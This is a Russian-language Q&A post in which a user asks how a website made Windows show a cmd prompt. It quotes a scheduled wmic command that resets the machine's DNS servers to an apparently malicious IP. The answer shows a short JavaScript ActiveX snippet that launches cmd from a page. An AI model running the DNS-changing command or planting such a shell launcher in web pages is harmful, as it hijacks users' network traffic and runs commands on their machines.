Как браузеру удается выполнить команду в cmd?

Question

Некоторое время назад при посещении какого-либо веб-сайта в Opera 12.12 на экране появилось следующее приглашение Windows 7:

C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8")

Очевидно, я отказался от этого.

Метод, с помощью которого фишеры пытались получить мои данные, довольно понятен, но как им удалось выполнить команду из браузера?

Answer 1

Фишеры могут использовать Javascript следующим образом:

var wsh = new ActiveXObject('WScript.Shell');
command = 'cmd /k ' + 'what ever ...';
wsh.Run(command);

Это работает, только если вы отключите функции безопасности в вашем браузере, которые должны будут использовать ActiveX.